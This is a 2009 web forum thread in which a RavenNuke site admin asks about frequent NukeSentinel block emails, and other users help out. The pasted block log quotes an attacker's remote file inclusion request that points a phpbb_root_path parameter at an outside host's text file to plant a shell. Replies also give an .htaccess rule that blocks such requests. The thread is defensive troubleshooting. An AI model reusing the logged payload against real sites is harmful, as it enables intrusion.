What is causing these emails?

Hangin' Around Joined: Aug 20, 2008 Posts: 28

I keep getting tons of these emails emailed to my admin account on our website. I recently updated to Raven Nuke from 8.1 phpnuke. I am getting like 10 a day, and I am not sure what is wrong as I am having difficulty understanding the message.

I can't paste the message here I am getting "The resource/content requested is not in an acceptable format."

How can I supply the email?

Site Admin Joined: Jun 04, 2004 Posts: 6433

Just paste the main text message from the email. It doesn't need to contain any formatting.

That said, without knowing what types of messages you're getting (i.e. which blockers are being triggered), are you using request method or string blockers? Also, harvester and referer blocks can be triggered frequently if these happen on your sites.

For some blocks, you may wish NOT to receive an email. For example, harvesters and referers are blocked before they can do anything on your site, so you probably don't need an email every time they visit. To turn off emails, just change the Activate setting for these blockers to something that does not include email.

Posted: Tue Sep 29, 2009 8:24 pm

The message is from: Mail Delivery System
With a subject of : Mail delivery failed: returning message to sender

So its like my site is trying to send something, but yet the email is from Nuke Sentinel.

I will attempt to paste again...

Code:

This message was created automatically by mail delivery software.





A message that you sent could not be delivered to one or more of its


recipients. This is a permanent error. The following address(es) failed:





  [ Only registered users can see links on this board! Get registered or login! ]


    Unrouteable address





------ This is a copy of the message, including all the headers. ------





Return-path: <dofadmin@teamdof.com>


Received: from teamdof by server307.serverquality.com with local (Exim 4.69)


(envelope-from <dofadmin@teamdof.com>)


id 1MsXzO-0002JD-Et


for [ Only registered users can see links on this board! Get registered or login! ]; Tue, 29 Sep 2009 03:23:14 -0500


To: e <w@server307.serverquality.com>


Subject: Blocked abuse from 195.186.64.229


From: [ Only registered users can see links on this board! Get registered or login! ]


Reply-To: [ Only registered users can see links on this board! Get registered or login! ]


Date: Tue, 29 Sep 2009 03:23:14 -0500


X-LibVersion: 3.3.2_4


MIME-Version: 1.0


Content-Type: text/plain; charset=iso-8859-1; format=flowed


Content-Transfer-Encoding: 8bit


Message-ID: <20090929082314.8877.622664592.swift@www.teamdof.com>


X-ServerQuality-MailScanner-Information: Please contact the ISP for more information


X-ServerQuality-MailScanner-ID: 1MsXzO-0002JD-Et


X-ServerQuality-MailScanner: Found to be clean


X-ServerQuality-MailScanner-SpamCheck: not spam, SpamAssassin (not cached,


score=-2.6, required 7, autolearn=not spam, BAYES_00 -2.60,


NO_RELAYS -0.00)


X-ServerQuality-MailScanner-From: [ Only registered users can see links on this board! Get registered or login! ]


X-Spam-Status: No





Created By: NukeSentinel(tm) 2.6.02


Date &amp; Time: 2009-09-29 03:23:14 CDT GMT -0500


Blocked IP: 195.186.64.229


User ID: Anonymous (1)


Reason: Abuse-Filter


--------------------


Referer: none


User Agent: Mozilla/5.0


HTTP Host: [ Only registered users can see links on this board! Get registered or login! ]


Script Name: /modules.php


Query String: name=Stories_Archive // arcade.php ? phpbb_root_path = http://www.karuturi.com/baner.txt???


Get String: name=Stories_Archive // arcade.php ? phpbb_root_path= http://www.karuturi.com/baner.txt???


Post String: Not Available


Forwarded For: none


Client IP: none


Remote Address: 195.186.64.229


Remote Port: 9463


Request Method: GET

Ok I had to add spaces to the Query String and Get String lines for the forum to allow the post..

I have got 15 of these so far today..

I do get emails to my admin account regarding blocked ip's but not this frequently.. I have no idea where the "w@server307.serverquality.com" is from...????

Posted: Wed Sep 30, 2009 12:21 am

Well it looks like someone has been attempting to hack you site, but NS has blocked them.

Check the email address set in you NS admin panel.

Worker Joined: Mar 30, 2009 Posts: 132

Code:




Referer: none


User Agent: Mozilla/5.0


HTTP Host: [ Only registered users can see links on this board! Get registered or login! ]


Script Name: /modules.php


Query String: name=Stories_Archive // arcade.php ? phpbb_root_path = http://www.karuturi.com/baner.txt???


Get String: name=Stories_Archive // arcade.php ? phpbb_root_path= http://www.karuturi.com/baner.txt???


Post String: Not Available


Forwarded For: none


Client IP: none


Remote Address: 195.186.64.229


Remote Port: 9463


Request Method: GET

i get that alot. iirc its trying to upload a shell script into your site. i think i block 5 to 10 a day myself.

make sure your e-mail is set rigt in NS admin as jakec said

Posted: Wed Sep 30, 2009 10:45 pm

Well the email was set wrong in NS.. I changed it. I think that stopped it.. Will report if it didn't..

Thanks for the help...

BTW - Should NS be blocking the offending ip's? Cause I have nothing in my blocked ip list. I have changed the permissions to 666 and the path appears to be right in NS prefs. Is there something else I need to do?

Worker Joined: Aug 26, 2007 Posts: 236

If you add these lines in your .htaccess these types of hacks will be blocked prior to Sentinel and you will then not get any more of these emails:

RewriteEngine On

RewriteCond %{THE_REQUEST} .*http:\/\/.* [OR]
RewriteCond %{THE_REQUEST} .*http%3A%2F%2F.*
RewriteRule ^.* - [F]

Posted: Thu Oct 01, 2009 12:21 am

Blocked IP's are saved in two places, the database and the .htaccess file. If this is not happening make sure the blocker settings are set correctly in NS.

Posted: Thu Oct 01, 2009 10:17 am

It was the blocker settings. I will add the code to my .htacess file also..

Thanks!